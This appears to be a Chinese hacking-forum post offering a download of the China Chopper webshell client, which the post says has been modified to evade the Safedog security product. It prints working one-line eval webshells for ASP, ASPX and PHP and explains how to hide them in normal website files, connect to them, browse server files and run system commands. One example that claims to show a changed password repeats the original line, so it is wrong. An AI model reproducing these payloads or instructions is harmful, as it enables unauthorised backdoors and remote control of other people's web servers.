- 論壇徽章:
- 0
|
2015年最新過狗版菜刀-中國菜刀
中國菜刀最新過狗版,過安全狗,升級處理,好用,所以就拿出來共享了
好東西,我就不截圖了
2015年最新過狗版菜刀-中國菜刀.rar
(259.63 KB, 下載次數(shù): 102)
2015-01-13 01:14 上傳
點擊文件名下載附件
聲明:
一切有關(guān)安全、后門類軟件均會被報毒,不信任可不下載,如不放心可放入虛擬機、沙盒內(nèi)運行。
中國菜刀是一款專業(yè)的網(wǎng)站管理軟件,用途廣泛,使用方便,小巧實用。只要支持動態(tài)
腳本的網(wǎng)站,都可以用中國菜刀來進行管理!
下面簡單介紹一下菜刀的功能:
首先說一下菜刀的功能,菜刀是用來連一句話的,asp、aspx、php的一句話菜刀都可以連,只是這幾種一句話語句不一樣。
asp的一句話是:<%eval request(“pass”)%>
aspx的一句話是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句話是:<?php @eval($_POST['pass']);?>
這幾個一句話的密碼都是pass,也就是雙引號或者單引號包含著的這部分,比如我想把asp的一句話的密碼改成drvfan,那么改完之后就是這樣的:
<%eval request(“pass”)%>
其他同理。
要想連一句話,你首先得把這個一句話插入到一個正常的網(wǎng)站文件中,asp的一句話插入到asp文件里,aspx的一句話插入到aspx文件里,php同理。
當然,你也可以把一句話單獨寫在一個文件里,比如你新建了一個asp文件,這個asp文件的全部內(nèi)容就只有一個一句話,也是可以的。
插入了一句話木馬,下面就是連接了。
在菜刀主界面,右擊,選擇“添加”,
在“地址”這里填上你插入一句話的文件的地址,后邊的那個小框填的是你的一句話的密碼,其他的不用填,
填完之后單擊“添加”,就可以了。
添加完畢后,你的這個一句話的shell會顯示到主界面里,右擊它,選擇“文件管理”,就可以看到網(wǎng)站上的文件了
在菜刀里還有一個功能,是“虛擬終端”,也是在右鍵菜單里的,這個相當于webshell中的執(zhí)行DOS命令的功能
如果你的shell有權(quán)執(zhí)行DOS命令,那么直接輸入命令回車就可以看到結(jié)果了 |
|